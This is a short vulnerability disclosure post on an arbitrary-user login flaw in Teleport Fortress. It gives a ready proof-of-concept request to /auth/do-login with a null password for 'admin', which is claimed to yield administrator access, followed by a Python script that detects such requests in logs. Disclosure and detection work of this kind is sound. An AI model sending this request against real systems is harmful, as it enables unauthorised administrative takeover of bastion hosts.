Teleport Fortress do-login Any user login vulnerability
Vulnerability Description
Teleport Fortress has an arbitrary user login vulnerability. By constructing a special request, an attacker can log in to the Fortress as any user and obtain other system permissions.
Vulnerability Impact
Teleport Version <= 20220817
Network surveying and mapping
Vulnerability reproduction
Login page
PoC for verification. The captcha parameter is the verification code.
POST /auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}
A returned code of 0 means success; accessing /dashboard afterwards gives administrator permissions.
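For detection, the request above has one distinctive property: the password field in args is JSON null. The following is an added example, not part of the original post or of Teleport's code, that flags such requests in logged traffic. It assumes a reverse proxy or WAF in front of Teleport records request bodies; the function names and sample records are hypothetical.

```python
import json
from urllib.parse import parse_qs

LOGIN_PATH = "/auth/do-login"  # endpoint named in the PoC above

def check_login_request(method, path, body):
    """Return a reason string if the request matches the PoC pattern, else None."""
    if method.upper() != "POST" or path.split("?", 1)[0] != LOGIN_PATH:
        return None
    values = parse_qs(body, keep_blank_values=True).get("args")
    if not values:
        return "do-login request without args parameter"
    try:
        args = json.loads(values[0])
    except ValueError:
        return "args is not valid JSON"
    if not isinstance(args, dict):
        return "args is not a JSON object"
    # Assumption: legitimate password logins always send a non-empty string.
    # Tune this check if the deployment uses login types without a password.
    password = args.get("password")
    if not isinstance(password, str) or password == "":
        return "password is %r for user %r" % (password, args.get("username"))
    return None

# Constructed sample records (source, method, path, body); not real traffic.
SAMPLE_LOG = [
    ("198.51.100.7", "POST", "/auth/do-login",
     'args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}'),
    ("192.0.2.10", "POST", "/auth/do-login",
     'args={"type":2,"username":"alice","password":"S3cret!","captcha":"abcd","oath":"","remember":false}'),
    ("192.0.2.10", "GET", "/dashboard", ""),
]

def scan(records):
    """Return (source, reason) for every record that should be reviewed."""
    hits = []
    for source, method, path, body in records:
        reason = check_login_request(method, path, body)
        if reason:
            hits.append((source, reason))
    return hits

if __name__ == "__main__":
    for source, reason in scan(SAMPLE_LOG):
        print(source, reason)
```

A hit followed by a request to /dashboard from the same source is the sequence described above and is worth correlating in the same log.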
This post is licensed under CC BY 4.0 by the author.